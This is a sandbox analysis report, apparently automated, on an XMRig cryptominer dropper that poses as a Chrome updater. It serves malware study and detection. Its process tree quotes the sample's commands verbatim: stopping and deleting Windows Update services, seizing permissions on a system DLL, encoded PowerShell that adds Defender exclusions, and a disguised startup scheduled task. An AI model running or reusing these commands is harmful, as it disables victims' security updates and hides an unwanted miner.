Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
13-11-2022 17:06
General
-
Target
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe
-
Size
2.5MB
-
MD5
3db308a4a293420df30a444944f2ccb6
-
SHA1
4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
-
SHA256
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
-
SHA512
a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
SSDEEP
49152:BIX8orGKWyNi/abKDNtEgSsoi/hiO0WygnaWjIe1BSORYt3m5rj4A19oo/tGIPIP:bBsi/cKRt1SsoipihWyzcbaqYpm5wA10
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 6 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAB3ACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgASQBBAGIAdwBCAGoAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAbABBAEcATQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwB0AHQAdwAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGcAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHoAYgBkAGYAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBnAGYAeQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGEAOQBjAGQANAA2ADcANgBlAGUAMQA5AGMAMQA1ADEANAA4AGMAZgA0ADUAOQAwAGIAOQBmADMAMgAzADYAMwBiAGQANgAxAGUAYwBiADMAZABkAGYAYwAyADgANgA3ADMAYQA3ADkANwBlADgAYwBmADMAZgBkAGEANQBhADcALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB1AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwB6AGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHIAbwBjACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBlAGMAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "giyxhlnw"4⤵
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe xzdqclthzpcazp0 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaKQjZcNqd1938GRB8dGIm2jUo1P1EwqD6WsAjiwuDAWLCfR3BRzADWgpJ7CQxFR7+anCrIhDT/00bieUv+n3qzA/ZBTeGzJOEzp2ufDT4ez7i94dFOd7htQWVDfk0FvX4a+088kTIG70C+qoBp7PPo1o2A5n8KneHMS5/guyM+nQkyz5PCuPtW1otcyRyfkXuJFiqnw4xHcIav5OP5k07szbPwxOTbqWzmU88osXNGi3m9t4Gwg0G56kg7iABsHbrK5UzmJ/FgcEz0jZ/3un+gS+Rf+IWiuYLXvFLT3dhSYQEp2MbWtYrce1ynEL2g4m1i3nZh07E/ntkN3OenhsoDXadhJLavl9NK0sNtCm2olw7Es0i9g5kp1KX++H2R+p8TerO894R0g6VcrvRRJ+3FNfFJEDMYbyeu61ZEsJe2P9UVJBbbbkXTZny0JoLyKbpVAGAT9wmmSPrpsDA8G3bbPD2mzExQDUSq6vDCincR1pfndSpJ6ETOEAak8MK+m/fKPDk8iiEXOF+mvhBrtYGTnSCz2kL1bsCs/yWKCKTGO/4=4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD53db308a4a293420df30a444944f2ccb6
SHA14cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD53db308a4a293420df30a444944f2ccb6
SHA14cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
memory/408-153-0x0000000000000000-mapping.dmp
-
memory/432-204-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/432-230-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/432-210-0x0000027569220000-0x0000027569240000-memory.dmpFilesize
128KB
-
memory/432-205-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/432-232-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/432-203-0x000000014036EAC4-mapping.dmp
-
memory/432-202-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/476-171-0x0000000000000000-mapping.dmp
-
memory/480-136-0x0000000000000000-mapping.dmp
-
memory/516-154-0x0000000000000000-mapping.dmp
-
memory/628-138-0x0000000000000000-mapping.dmp
-
memory/716-222-0x0000000000000000-mapping.dmp
-
memory/812-157-0x0000000000000000-mapping.dmp
-
memory/852-181-0x00007FFD519A0000-0x00007FFD52461000-memory.dmpFilesize
10.8MB
-
memory/852-199-0x0000026234E30000-0x0000026234E42000-memory.dmpFilesize
72KB
-
memory/852-207-0x00007FFD519A0000-0x00007FFD52461000-memory.dmpFilesize
10.8MB
-
memory/880-227-0x0000000000000000-mapping.dmp
-
memory/908-224-0x0000000000000000-mapping.dmp
-
memory/1000-139-0x0000000000000000-mapping.dmp
-
memory/1100-156-0x0000000000000000-mapping.dmp
-
memory/1152-193-0x0000000000000000-mapping.dmp
-
memory/1200-167-0x0000000000000000-mapping.dmp
-
memory/1308-133-0x00000241AED20000-0x00000241AED42000-memory.dmpFilesize
136KB
-
memory/1308-177-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/1308-132-0x0000000000000000-mapping.dmp
-
memory/1308-137-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/1532-160-0x0000000000000000-mapping.dmp
-
memory/1744-142-0x0000000000000000-mapping.dmp
-
memory/1796-221-0x0000000000000000-mapping.dmp
-
memory/1940-201-0x0000000000000000-mapping.dmp
-
memory/2156-148-0x0000000000000000-mapping.dmp
-
memory/2156-220-0x0000000000000000-mapping.dmp
-
memory/2208-197-0x0000000000000000-mapping.dmp
-
memory/2248-186-0x00000159EE190000-0x00000159EE19A000-memory.dmpFilesize
40KB
-
memory/2248-183-0x00000159EDF60000-0x00000159EDF7C000-memory.dmpFilesize
112KB
-
memory/2248-187-0x00000159EE1F0000-0x00000159EE20A000-memory.dmpFilesize
104KB
-
memory/2248-188-0x00000159EE1A0000-0x00000159EE1A8000-memory.dmpFilesize
32KB
-
memory/2248-191-0x00007FFD519A0000-0x00007FFD52461000-memory.dmpFilesize
10.8MB
-
memory/2248-190-0x00000159EE1E0000-0x00000159EE1EA000-memory.dmpFilesize
40KB
-
memory/2248-178-0x0000000000000000-mapping.dmp
-
memory/2248-189-0x00000159EE1D0000-0x00000159EE1D6000-memory.dmpFilesize
24KB
-
